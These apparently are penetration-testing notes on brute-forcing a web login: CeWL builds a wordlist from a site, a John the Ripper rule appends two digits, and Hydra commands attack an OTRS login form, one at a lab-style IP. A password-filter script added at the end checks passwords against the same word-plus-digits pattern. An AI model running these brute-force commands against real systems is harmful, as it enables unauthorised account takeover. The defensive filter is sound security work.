The intent here is to create our own wordlist for a website/page whose credentials we want to brute-force (rockyou.txt does not always work, so here we are).
Cewl + Hydra
# Create a wordlist of a website; put the whole path of the website
cewl -w wordlist.txt -d 5 http://<IP>/html5
# Change -l user and pass, post request and failed request; -s is for port
hydra -l root@localhost -P wordlist.txt <IP> http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:Login Failed" -V
hydra -L ../usernames.txt -P /root/scripts/wordlist/CeWL/pw.txt 10.11.1.39 http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
# Creating a wordlist with Cewl
cewl www.testwebsite.com -m 6 -w pass.txt
# -m is min 6 length word
# Creating wordlist + adding a rule in John the Ripper
sudo nano /etc/john/john.conf
# -> Add this rule in last: add two numbers to the end of each password
$[0-9]$[0-9]
# Took the wordlist, added the rules, and output the result to mutated.txt
john --wordlist=pass.txt --rules --stdout > mutated.txt
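
The same word-plus-two-digits candidates can be checked from the defender's side. This is an added example, not part of the original notes: a password filter that rejects anything a site-derived wordlist mutated with `$[0-9]$[0-9]` would contain. The function names and the sample page text are constructed for illustration, and the word extraction only approximates CeWL's.

```python
import re

MIN_LEN = 6  # same minimum word length as the `cewl -m 6` run above

# Constructed sample of visible text from the organisation's own site.
SAMPLE_PAGE = "Welcome to Northwind Helpdesk. Contact support about tickets."


def site_words(text, min_len=MIN_LEN):
    """Return lowercase alphabetic words of at least min_len characters."""
    return {w.lower() for w in re.findall(r"[A-Za-z]+", text) if len(w) >= min_len}


def is_guessable(password, words):
    """True if password is a site word, or a site word plus two digits.

    Mirrors the rule $[0-9]$[0-9] (exactly two digits appended). The
    comparison is case-insensitive, which is stricter than the wordlist.
    """
    p = password.lower()
    if p in words:
        return True
    base, tail = p[:-2], p[-2:]
    return len(tail) == 2 and tail.isascii() and tail.isdigit() and base in words


def audit(candidates, text):
    """Return the candidates that should be rejected at password-set time."""
    words = site_words(text)
    return [c for c in candidates if is_guessable(c, words)]


if __name__ == "__main__":
    # Constructed candidate passwords.
    tried = ["Helpdesk07", "northwind", "helpdesk2024", "correct-horse-battery"]
    for pw in audit(tried, SAMPLE_PAGE):
        print("reject:", pw)
```

Feed it the text of your own public pages and call `is_guessable` from the password-change path.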